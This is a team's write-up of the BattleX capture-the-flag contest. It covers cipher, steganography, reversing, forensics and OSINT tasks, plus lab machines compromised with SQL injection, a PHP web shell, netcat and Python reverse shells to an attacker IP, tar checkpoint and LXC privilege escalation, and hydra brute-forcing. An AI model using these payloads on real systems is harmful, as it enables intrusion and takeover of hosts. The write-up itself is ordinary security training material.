Team Name: Dont.Test.Us

Team Members

• Tahaa Farooq - @tahaafarooq
• Erick Alex - @AlienKeric
• Mercy John - @daemon
• Paul Kapufi - @KapufiPaul
• Nicholaus Nyarwango - @nicl4ssic

Final Scoreboard

Challenge Tasks

Task 1: Welcome to BattleX CTF

Task 2: crackme

='%+H9h/)PAOguI;b0W/=)1]K:/s#,;-7d59l!cc<,QYYA2#`<>'`e:<_#l.=''?-AQ:`Z;f+6a@TI8g<*4*@@RW,"9ggZu

We pasted the encoded string in Cyberchef and by using 'Magic' recipe it revealed the flag

*>u_5vI=(wDH~%9>}>y;+s"a|;u<|K4K*au<+%#=~s|J};xb*;#>}?_l

flag:battleX{098f6bcd4621d373cade4e832627b4f6}

Were given a cipher text, so far this was a rot47, by using cyberchef we can get a flag

籥籴簿簻籥籴簿簺籥籴籀簽籥籴籀簽籥籴簿籙籥籴簿簾籥籴簾籁籥籴籀籘籥籴簼簾籥籴簿簾籥籴簿簻籥籴簿簾籥籴簼簻籥籴簼簻籥籴簼籂籥籴簼簽籥籴簿簾籥籴簿簼籥籴簿簽籥籴簼簹籥籴簿簾籥籴簼簹籥籴簿簿籥籴簼簹籥籴簼籁籥籴簿簾籥籴簿簺籥籴簿簻籥籴簼籀籥籴簼簿籥籴簼籂籥籴簼簹籥籴簿簽籥籴簼簻籥籴簿簺籥籴簼簿籥籴簿簾籥籴簿簾籥籴簼簿籥籴簼籂籥籴籀籚

flag:battleX{5ebe2294ecd0e0f08eab7690d2a6ee69}

With this challenge we were given something like a chinese message but infact it was not a chinesse it was a rot8000 then then encoded with hexdecimal which we can use even chart-gpt to solve this.

from here i knew this was something like hexdecimal so i used chart-gpt so solve from here

yzggovC{v99z18x428xy38w5u260853678922v03}

flag: battleX{e99a18c428cb38d5f260853678922e03}

This was a affine cipher text with online tools u can easly get the flag,simple like that

cammwiU{e8578ewy8458ni06ccc5uu76l58g5zb4}

We pasted the encoded string to Cyberchef and tried the 'Magic' recipe but there was no any lucky. Back to the challenge hint it said 'the key is battlex'. So we used "Vigenere Decode" recipe with the given key and we got the flag

Flag: battleX{d8578edf8458ce06fbc5bb76a58c5ca4}

Task 3: cat

We have been provided with an image and we are using file command to determine the file type

It's a JPEG image file, we tried to open it but nothing interesting. Then we decided to use stegseek to extract embedded files if there is any

And yes, we found embedded file that was extracted to cat-1718892409091.jpg.out. By using cat we get a base64 encoded string

Trying to decode the string using base64 we got a clear flag though it seems that its a zip file. We saved the file then unzipped it and we got the flag

Flag: battleX{5f4dcc3b5aa765d61d8327deb882cf99}

Task 4: reverse1

We have been provided with a file and we are using file command to determine the file type

It's a linux binary (ELF), we used rabin2 to check if there is any clear text from the binary and yes we got the flag

Flag: battleX{c1d9f50f86825a1a2302ec2449c17196}

Task 5: reverse2

We have been provided with a file and we are using file command to determine the file type

It's a linux binary (ELF), we used rabin2 to check if there is any clear text from the binary

When executing the binary it takes input from a user, if a user provide a correct required reversed value will get a flag, but if it's incorrect will get a message "Input does not match the required reversed value"

In order to get the flag, the binary takes the string 3TWQfd2245njBEWrTX but it should be reversed. Let's reverse it and get the flag

Flag: battleX{6c569aabbf7775ef8fc570e228c16b98}

Task 6: reverse3

There are simply 2 ways to solve this and get the flag, the first way is the intended way, and the second way is by debugging the binary.

Intended Way

First thing first, I need to fetch the strings which are readable;

I got a bunch of MD5 strings, I will save them aside, they look useful to us!

I then upload my binary to binary ninja for further analysis, but before we begin, let's try running our binary and see it's behavior and how it functions:

Okay running the binary we see that it takes the input, and then reverses the input string and displays the output but also fails and asks for another input! Let's head back to analysis!

As seen above, that's the main function , breaking it down we can see that it asks for an input and then a function known as reverse_string is called which I guess in this case it's the function that reverses our string as seen earlier and next a comparison is done to check if the string matches and if it matches the string it's being compared with and that's any one of the hashes respectively then it'll give the flag back!

Now that We have understood how this actually works! We don't need to review the reverse_string function because we have already seen the output. Our way forward right now is to reverse the first hash string and input it since it'll be reverse back to it's original form and the comparison will be True it'll give us the flag:

Alright but it doesn't end here, the flag format is BattleX{*}, in this case our flag isn't yet found, I went ahead to review the decode_function which decodes the flag and assigns it to var_318 before we are asked for an input:

I understand that it was first XOR'ed for us to be able to get the so called "flag" I tried performing an XOR bruteforce again to see if I can get the flag:

And there we go, we got the flag!

Debugging The Binary

Yea! I know this is un-necessary, but hell-yeah! Let's Do IT Anyways! So basically we realized that the variable var_318 is being assigned with the value of the flag from the decode_flag function which is called at the main function before we are prompted for input, In this case if we are able to set a breakpoint at the decode_flag return instruction then we will get the flag, i'll be using radare2 for this one!

First we need to open our binary in radare2:

Then we shall locate the address of sym.decode_flag function and there we have it, next up let's read the disassembled output of the main function and the sym.decode_flag function, so that we can know the address of the ret instruction and set a breakpoint at it! but also so that we can understand in which register the output will be saved to:

From the main function we can see that it's saved to rdi register, now let's open up the sym.decode_flag and set a breakpoint at the ret instruction:

We then set a breakpoint:

then we run our binary, and wait till it hits the breakpoint:

Now let's review the registers and look for RDI:

let's fetch the data inside the RDI register:

Task 7: machine1

SCANNING

# Nmap 7.94SVN scan initiated Sat Jun 29 04:07:42 2024 as: nmap -vvv -p 22,80 -sC -sV -oN nmap.txt 10.10.3.69
Nmap scan report for 10.10.3.69
Host is up, received echo-reply ttl 63 (0.50s latency).
Scanned at 2024-06-29 04:07:43 EDT for 23s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f8:89:12:c0:ab:91:e2:29:1f:55:a6:b1:aa:48:e5:37 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPxr21+eAHFrWP67taxly11JJI0DMgJjdhNeWpFCiN6CRTb9Rxz7p1RDMIXYqzN5C+Hy7nCbHkQ3nAwAHfPhzqawAIa4Mg/TfORplUUA7Od6mFgz5RUj33qXMS1uqMr4pWhQcT37RgpV6Vo++Yz9qBQ83HxWdP6A08orcL1t+FyoZxAn/qaQkeQQk+WChJQTIGxuicxMGIA0WthbL+OJU+vMqA6Gm11Z6aYAqV2AfVpj2cQukZPZ5FG0PdgJ1KgTPdkxv3KM15pFlIjhslIwusLT6gKwpU/tXdUXtGaXyBoU6vNeCdHYF2cBtOUhSJ62L1MVYrj+sLnBoDYCMcrgIF
|   256 46:05:a8:f4:66:29:41:79:01:a0:43:b8:a9:ef:47:5d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIdkg7iA2BElaTpbaWePGpDAUeXPr6/XchFO9Y9mtHZhUuGbwbJMphJmnS8fyEbSWXHfvf4EaA11N+NTjhhadxE=
|   256 04:db:fa:b1:16:82:c5:99:86:41:ba:8a:ea:72:34:08 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMcf9Dp5hGXAJYfBrk+rXvQ47Rtjoe+UuTQQ/fnB4X7Y
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Proverb Categories
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 29 04:08:06 2024 -- 1 IP address (1 host up) scanned in 24.69 seconds

ENUMERATION

### enuemerating port 80
With trying to enumerate port 80

http://10.10.3.69/45c48cce2e2d7fbdea1afc51c7c6ad26.html

upon enumerating the system we can see that if we click any of the categories we get something like md5, so we can use online tools to reverse the md5 and you will notice that the md5 is a simple number.

So if we can change it to '0' we get some juice info. such as ssh keys you can crack it with john or hashcat and then login.

if you login u get the user flag.

EXPLOITATION

## creds
username:jayhunts
password: chicken

And from here we can glab the user flag in the user home directory.

PRIVILEGE ESCALATION

privilege escalation was simple, once i saw the lxc is present i knew how to exploit this coz we just needed only to add the our own image and assign it privilege and moun to root directory simple as that.

reference:
1. https://steflan-security.com/linux-privilege-escalation-exploiting-the-lxc-lxd-groups/

As the article above says now we need to start the lxc image and execute it.The flag is in the /mnt/root/root/root.txt.

Task 8: machine2

SCANNING

PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Big Hacking Book Store

ENUMERATION

Scanning reveals only one running port so lets try to enumerate thiso one.

By checking the technologies we have get the idea of trying sql injection via a login page.

payload: admin' or 1=1-- -

for both username and password

After getting inside we get a ping system but so far the ping system block some of our filters.

EXPLOITATION

Bypassing this filter and execute command we can use null bytes to bypass this one.

From here we went further more and use burp suite for exploitation mode.

getting a shell we can write a simple php and upload actually here we need to find a location where we can upload our stuffs and i.e images.

Now we have already upload our file now lets got for command execution.

username = "hacksparo";
password = "hacksparoisthebest123";
$dbname = "books";

use the creds to login as hacksparo and glab the user flag in the home directory.

PRIVILEGE ESCALATION

with 'sudo -l' give us some juice info to get a root access.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc 10.21.19.120 4444 >/tmp/f" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

now if we run the sudo command it will execute our payload and we get root access.

Task 9: machine 3

SCANNING

# Nmap 7.94SVN scan initiated Sat Jun 29 04:59:12 2024 as: nmap -sC -sV -oN machine3.txt -T4 -vvv 10.10.137.169
Nmap scan report for 10.10.137.169
Host is up, received echo-reply ttl 63 (1.4s latency).
Scanned at 2024-06-29 04:59:13 EDT for 29s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63 vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.21.19.120
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0            4096 Jun 23 15:38 images [NSE: writeable]
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hacksparo Blogs - Cybersecurity & Pentesting
Service Info: OS: Unix

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 29 04:59:42 2024 -- 1 IP address (1 host up) scanned in 29.62 seconds

ENUMERATION

From the nmap scanning we have seen two open port that is port 21 and port 80, with port 21 allows anonymous login and also allows us to upload something via our machine so we can abuse this one.

payload:<?php system($_GET["batman"]);?>

Now inorder to find where this images are being locate in the web page lets find any page and try to view it another tab it will show us where exactly our images are being uploaded via ftp server.

EXPLOITATION

The location where our image is being uploaded is 'http://10.10.195.185/userdata45545/image1.jpg'

payload:
python3+-c+'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.21.19.120",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

As you can see user with shell are two i.e commanderx and ftpuser. But the password that was being used here was also the root password so we can login as root.

##root creds
username: root
password:91297623

PRIVILEGE ESCALATION

both user flag and root flag are on the same directory.

Task 10: forensics

We have been provided with a file and we are using file command to determine the file type

It's a pcapng capture file. Let's use wireshark to analyze the file

Checking the protocol hierarchy we see a lot of protocols but what we are interested with are ftp and http, we start with ftp and follow tcp streams

We determined that a user logged in to the ftp server using the credentials azera:hacktheplanet123 and he did nothing then he logged out. Now let's analyze the http protocol and see what happened

Filtering the http protocol shows that a user tried to upload a file, we follow http streams to analyze the upload process

A user successful uploaded a file named "tazine"

We see that the file was encoded in base64, we upload the encoded string to cyberchef and we get our flag

Flag: battlex{e99a18c428cb38d5f260853678922e03}

Task 11: Find me babe

We have been provided with a file and we are using file command to determine the file type

It's a Squashfs filesystem. What is it? According to Wikipedia

Squashfs is a compressed read-only file system for Linux. Squashfs compresses files, inodes
and directories, and supports block sizes from 4 KiB up to 1 MiB for greater compression.
Several compression algorithms are supported. Squashfs is also the name of free software,
licensed under the GPL, for accessing Squashfs filesystems.

Squashfs is intended for general read-only file-system use and in constrained block-device
memory systems (e.g. embedded systems) where low overhead is needed. 

Searching in Google how to analyze the Squashfs file we found this link here on how to analyze squashfs file. We will use binwalk tool to extract the squashfs filesystem

We extracted the squashfs file system into our attack machine, and listing the directories we got the linux filesystems

Since our aim is to find the flag we will use find and grep command to achieve this

Alternative 2: We can use rg command for recursively search the directory for lines matching a pattern "battlex"

Flag: battlex{1bc29b36f623ba82aaf6724fd3b16718}

Task 12: hackland

This one was one among another easy challenge, we were just given a large file with many directories, so we were needed to extract this and extract the flag.

by using the power of batman and grep we can get a flag easy like that.

command: grep  -iR battlex{}

flag.txt:battlex{8c9fc2c0a153a244a45635fb8f4d71f1}

Task 13: another_machine

SCANNING

# Nmap 7.94SVN scan initiated Sat Jun 29 14:11:13 2024 as: nmap -vvv -p 22,80 -sC -sV -oN machin4.txt 10.10.160.167
Nmap scan report for 10.10.160.167
Host is up, received echo-reply ttl 63 (1.7s latency).
Scanned at 2024-06-29 14:11:16 EDT for 24s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f8:89:12:c0:ab:91:e2:29:1f:55:a6:b1:aa:48:e5:37 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPxr21+eAHFrWP67taxly11JJI0DMgJjdhNeWpFCiN6CRTb9Rxz7p1RDMIXYqzN5C+Hy7nCbHkQ3nAwAHfPhzqawAIa4Mg/TfORplUUA7Od6mFgz5RUj33qXMS1uqMr4pWhQcT37RgpV6Vo++Yz9qBQ83HxWdP6A08orcL1t+FyoZxAn/qaQkeQQk+WChJQTIGxuicxMGIA0WthbL+OJU+vMqA6Gm11Z6aYAqV2AfVpj2cQukZPZ5FG0PdgJ1KgTPdkxv3KM15pFlIjhslIwusLT6gKwpU/tXdUXtGaXyBoU6vNeCdHYF2cBtOUhSJ62L1MVYrj+sLnBoDYCMcrgIF
|   256 46:05:a8:f4:66:29:41:79:01:a0:43:b8:a9:ef:47:5d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIdkg7iA2BElaTpbaWePGpDAUeXPr6/XchFO9Y9mtHZhUuGbwbJMphJmnS8fyEbSWXHfvf4EaA11N+NTjhhadxE=
|   256 04:db:fa:b1:16:82:c5:99:86:41:ba:8a:ea:72:34:08 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMcf9Dp5hGXAJYfBrk+rXvQ47Rtjoe+UuTQQ/fnB4X7Y
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Death Note - Add Names
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 29 14:11:40 2024 -- 1 IP address (1 host up) scanned in 26.64 seconds

ENUMERATION

With scanning reveals some two open port but since we have no creds lets we decided to deal with port 80 and where u will find something interested.

port 80

trying to bypass with some simple extensions we can see that we get some erros.

This error was very interesting for me, since because from here i can do this in many ways to bypass this one so lets go with easy newbies way, lets not complicate stuffs.

What this filter in the upload section tries to do is that it only check the file header and it check on the first four bytes(this sucks for sure).

FOOTHOLDING

I uploaded a valid image so as i can see where this file is being uploaded and see it it leaks some uploads section.

If we browser to note we find a location were images are being uploaded mhmmm this is nice.

After some simple edit on the php and using hexeditor i came with my simple payload here.

EXPLOITATION

since we know the location of our payload being lets execute some simple command on the target and then lets get some shell using some built in extensions.

getting a shell as www-data

So far we can see that we have three users root,light,ryuk

shell as ryuk

In the /opt there is a id_rsa key we can use that one to move to another user.

user flag is own by root and light mhmm nice, but we have some rotecreds so lets use that one to get light access.

shell as light

PRIVILEGE ESCALATION

after running some find command to such for SUID binaries we get some of interested binaries to exploit here.

with user ryuk we can exploit via a docker-engine lxc just exit on user light and use the same approach as we did on the first machine.

And now we can get a root flag which we have just mount in the /mnt/root/root.txt

Task 14: machine :)

SCANNING

Port scanning reveal that there are 3 ports running on the target

ENUMERATION

Port 21 (FTP)

From the port scan results we see that port 21 is running vsftpd 3.0.3 and "Anonymous login" is allowed, so let's login

We found two files from the FTP Server and downloaded them into our machine. We read the files and find this information

The message in 'note' file it's from Security department (Hacksparo) reminding Mrs S to change her password. We saved the username found (Mrs S & Hacksparo) they may be helpful later.

I also Google searched and found no current exploits for vsFTPd 3.0.3. We can next take a look at HTTP on port 80 since there is also no current exploit for the version of SSH running on port 22

Port 80 (HTTP)

We visited port 80 on browser there is nothing interesting, but from port scanning results we observed that there is a robots.txt on the site. Let's view it

Visiting the page page we can see that it is displaying a .txt file stored in /var/www/html

It seems that there is a Local File Inclusion vulnerability, let's try to read /etc/passwd file from the server

We were able to read /etc/passwd file from the server and we found 3 users (root, alex and sophia).

EXPLOITATION

Remember from the note file from FTP server, there was a message to Mrs S to change her password since it's crackable. From the /etc/passwd file there is a user called sophia. So we can guess that user is Mrs S and since her password was able to be cracked we can use hydra to crack her password.

We found her SSH login credentials sophia:babygurl now let's try to login

We were able to login as sophia but we can't find the user flag

Shell as alex

Navigating to the home directory of user alex we found the user.txt file but we can't read it as sophia since it is owned by alex. Listing all files in the directory we discovered the directory named ... let's navigate in it

Navigating to the directory we found the file my_pass, we read it and we got user alex credentials, we login as alex and we were able to read the user.txt file

User.txt: e4d909c290d0fb1ca068ffaddf22cbd0

PRIVILEGE ESCALATION

Running sudo -ll we can see that user alex can use curl to access the file system, escalate or maintain privileged access. Let's use it to read root.txt

Root.txt: 5d41402abc4b2a76b9719d911017c592

Task 15: TNISO

We have been given an image with "Can you find the email address of the owner of this artwork? I need to contact him."
Reading again the task name it seem that it has been reversed, TNISO = OSINT. So, we are supposed to use OSINT skills to find the email of the artwork owner. Navigating to Google we searched the image and we found many results but the interesting one was the Instagram link

Visiting the link we see it's from the account of a user @art0fdeath posted that photo and tagged the user @clayshaper

It seems that the owner of the artwork is @clayshaper visiting at his account we found a link to a user website

Visiting the link we found links to his different accounts, also we found his email address

Flag: battlex{clayshaper@outlook.com

Task 16: nohint

We have been provided with a file and we are using file command to determine the file type

It's a jpeg image format file, but trying to open it seems like it is corrupted. We check the file signature of a file using hexeditor tool

The file signature of a file is not correct since the file signature of a jpeg format starts with FF D8 FF E0 so will have to change it to its correct signature using hexeditor

We save the file and open it. It works now we can see the correct image. Using exiftool to check for the file metadata nothing seem interesting

Using steghide to check if there is and embedded file in the image

Since we don't have a passphrase we can't extract any embedded file so we will use stegseek to perform a bruteforce

We were able to extract embedded file, let's read the flag

Flag: battlex{5f4dcc3b5aa765d61d8327deb882cf99}

COMMENTS

alien-keric

The ctf was really fun and simple by the way, with team work we managed to solve them the time they were being uploaded like fast-of-furious that why we managed to win this CTF, it was really nice i liked the moment when the guy uploaded the challenge and we solved it within 2-3 seconds because we were waiting for him to upload fucking crazy we are batmans D0nt T3st Us we will deal with u.

Tahaa Farooq

WE ZOMBIE! The CTF was great because we won! 💀 Overall the challenges were great, GGs to hacksparo for the challenges that he authored I enjoyed mostly the machines rather than any other category but yeah FOR GOTHAM!!! AM BATMAAAN!🧟

nicl4ssic

Tackling all the challenges in time and securing 1st position was an exhilarating experience! I am incredibly proud of our team's effort and collaboration. This victory not only highlights our technical skills but also our ability to work seamlessly under pressure. Looking forward to more such exciting challenges!. Again WE ARE NOT TO BE TESTED pewpew 💣

daemon

DON